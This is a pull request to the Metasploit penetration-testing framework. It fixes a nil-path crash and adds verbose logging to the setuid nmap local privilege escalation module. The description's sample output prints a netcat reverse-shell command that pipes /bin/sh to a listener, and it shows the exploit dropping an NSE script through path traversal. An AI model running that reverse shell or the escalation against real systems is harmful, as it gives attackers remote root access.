### PR TITLE
Fix crash and add additional logging to the setuid nmap module

### DIFF
--- a/lib/msf/core/post/file.rb
+++ b/lib/msf/core/post/file.rb
@@ -181,6 +181,8 @@ module Msf::Post::File
   #
   # @param path [String] Remote filename to check
   def file?(path)
+    return false if path.nil?
+
     if session.type == 'meterpreter'
       stat = begin
         session.fs.file.stat(path)

--- a/modules/exploits/unix/local/setuid_nmap.rb
+++ b/modules/exploits/unix/local/setuid_nmap.rb
@@ -42,7 +42,8 @@ class MetasploitModule < Msf::Exploit::Local
         'Notes' =>
           {
             'Reliability' => [ REPEATABLE_SESSION ],
-            'Stability' => [ CRASH_SAFE ]
+            'Stability' => [ CRASH_SAFE ],
+            'SideEffects' => [ ARTIFACTS_ON_DISK ]
           },
         'DefaultTarget' => 0
       )
@@ -95,7 +96,8 @@ class MetasploitModule < Msf::Exploit::Local
 
     begin
       # Versions before 4.75 (August 2008) will not run scripts without a port scan
-      cmd_exec "#{datastore['Nmap']} --script #{scriptname} -p80 localhost #{datastore['ExtraArgs']}"
+      result = cmd_exec "#{datastore['Nmap']} --script #{scriptname} -p80 localhost #{datastore['ExtraArgs']}"
+      vprint_status(result)
     ensure
       rm_f(lua_file, exe_file)
     end


### PR DESCRIPTION
### Before

The module fails, there's no information why, and there's an miscellaneous `NoMethodError` error printed to the user:

```
msf6 exploit(unix/local/setuid_nmap) > rerun session=-1 lhost=192.168.49.180 lport=80 verbose=true
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.49.180:80 
[*] Dropping lua /tmp/nkpLoovk.nse
[*] Running /tmp/nkpLoovk.nse with Nmap
[-] Exploit failed: NoMethodError undefined method `[]' for nil:NilClass
[*] Exploit completed, but no session was created.
```

### After

The nmap command is now logged in verbose mode, and the NoMethodError has been fixed:

```
msf6 exploit(unix/local/setuid_nmap) > rerun session=-1 lhost=192.168.49.180 lport=80 verbose=true
[*] Reloading module...

[+] mkfifo /tmp/rujjoq; nc 192.168.49.180 80 0</tmp/rujjoq | /bin/sh >/tmp/rujjoq 2>&1; rm /tmp/rujjoq
[*] Started reverse TCP handler on 192.168.49.180:80 
[*] Dropping lua /tmp/fBIuDAnn.nse
[*] Running /tmp/fBIuDAnn.nse with Nmap
[*] 
Starting Nmap 7.40 ( https://nmap.org ) at 2021-09-20 20:47 EDT
WARNING: Running Nmap setuid, as you are doing, is a major security risk.

sh: 1: nc: not found
NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:622: /usr/bin/../share/nmap/scripts/../../../../../../../../../../tmp/fBIuDAnn.nse is missing required field: 'action'
stack traceback:
        [C]: in function 'error'
        /usr/bin/../share/nmap/nse_main.lua:622: in field 'new'
        /usr/bin/../share/nmap/nse_main.lua:820: in local 'get_chosen_scripts'
        /usr/bin/../share/nmap/nse_main.lua:1271: in main chunk
        [C]: in ?

QUITTING!
[*] Exploit completed, but no session was created.
```

It's now clear to the user that nc isn't available and a different payload should be used.

## Verification

Open a linux session on a target which has a setuid an nmap binary.